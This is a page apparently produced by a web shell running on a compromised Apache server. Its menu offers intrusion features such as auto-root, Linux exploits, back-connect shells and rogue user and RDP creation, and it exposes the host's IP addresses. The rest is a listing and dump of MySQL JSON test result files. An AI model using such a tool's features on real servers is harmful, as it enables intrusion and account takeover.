Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.250.110
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
json /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
json_agg.result
34.15
KB
-rw-r--r--
json_client_innodb.result
1.29
KB
-rw-r--r--
json_client_ndb.result
1.43
KB
-rw-r--r--
json_conversions.result
1.57
MB
-rw-r--r--
json_ddl_innodb.result
2.86
KB
-rw-r--r--
json_ddl_ndb.result
3.54
KB
-rw-r--r--
json_fulltext_innodb.result
7
KB
-rw-r--r--
json_functions_innodb.result
260.05
KB
-rw-r--r--
json_functions_ndb.result
271.62
KB
-rw-r--r--
json_gcol_innodb.result
10.8
KB
-rw-r--r--
json_group_concat_innodb.resul...
3.02
KB
-rw-r--r--
json_group_concat_ndb.result
3.09
KB
-rw-r--r--
json_innodb.result
8.52
KB
-rw-r--r--
json_insert_innodb.result
71.19
KB
-rw-r--r--
json_insert_ndb.result
71.59
KB
-rw-r--r--
json_no_table.result
174.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : json_group_concat_ndb.result
set default_storage_engine=ndb; # ---------------------------------------------------------------------- # Test of aggregate function GROUP_CONCAT # ---------------------------------------------------------------------- create table t2(j json); Warnings: Warning 1478 Table storage engine 'ndbcluster' does not support the create option 'Binlog of table with BLOB attribute and no PK' insert into t2 values (json_array(ST_GeomFromText('LineString(0 0, 1 1, 2 2)'))); select group_concat(j order by j) from t2; group_concat(j order by j) [{"type": "LineString", "coordinates": [[0, 0], [1, 1], [2, 2]]}] drop table t2; create table t (c varchar(20)); insert into t values ('\\'); select char_length(c) from t; char_length(c) 1 insert into t values (X'0C'); select sum(char_length(c)) from t; sum(char_length(c)) 2 insert into t values ('"'); select sum(char_length(c)) from t; sum(char_length(c)) 3 insert into t values ('\a'); select sum(char_length(c)) from t; sum(char_length(c)) 4 insert into t values ('\b'); select sum(char_length(c)) from t; sum(char_length(c)) 5 insert into t values ('\t'); select sum(char_length(c)) from t; sum(char_length(c)) 6 insert into t values ('\n'); select sum(char_length(c)) from t; sum(char_length(c)) 7 insert into t values ('\r'); select sum(char_length(c)) from t; sum(char_length(c)) 8 insert into t values (X'10'); select sum(char_length(c)) from t; sum(char_length(c)) 9 select group_concat(c order by c) from t; group_concat(c order by c) , , ,, ,,",a,\ select char_length(group_concat(c)) from t; char_length(group_concat(c)) 17 select json_quote(group_concat(c order by c)) from t; json_quote(group_concat(c order by c)) "\b,\t,\n,\f,\r,\u0010,\",a,\\" select char_length(json_quote(group_concat(c))) from t; char_length(json_quote(group_concat(c))) 31 select convert(group_concat(c) using utf8mb4) = json_unquote(group_concat(c)) as should_be_equal from t; should_be_equal 1 delete from t; alter table t add column (j json); Warnings: Warning 1478 Table storage engine 'ndbcluster' does not support the create option 'Binlog of table with BLOB attribute and no PK' insert into t values (NULL, NULL); select json_quote(c), json_quote(j) from t; json_quote(c) json_quote(j) NULL NULL select json_unquote(c), json_unquote(j) from t; json_unquote(c) json_unquote(j) NULL NULL drop table t; create table t(j json, c varchar(20)); Warnings: Warning 1478 Table storage engine 'ndbcluster' does not support the create option 'Binlog of table with BLOB attribute and no PK' show create table t; Table Create Table t CREATE TABLE `t` ( `j` json DEFAULT NULL, `c` varchar(20) DEFAULT NULL ) ENGINE=ndbcluster DEFAULT CHARSET=latin1 insert into t values (cast('[1,2,3]' as json), '[a,b,c]'); insert into t values (cast(7 as json), '7'), (cast(2 as json), '2'); insert into t values (cast(7 as json), '7'), (cast(2 as json), '2'); select group_concat(j order by j), group_concat(distinct j order by j), group_concat(c order by c) from t; group_concat(j order by j) group_concat(distinct j order by j) group_concat(c order by c) [1, 2, 3],2,2,7,7 [1, 2, 3],2,7 2,2,7,7,[a,b,c] insert into t values (NULL, NULL); drop table t;
Close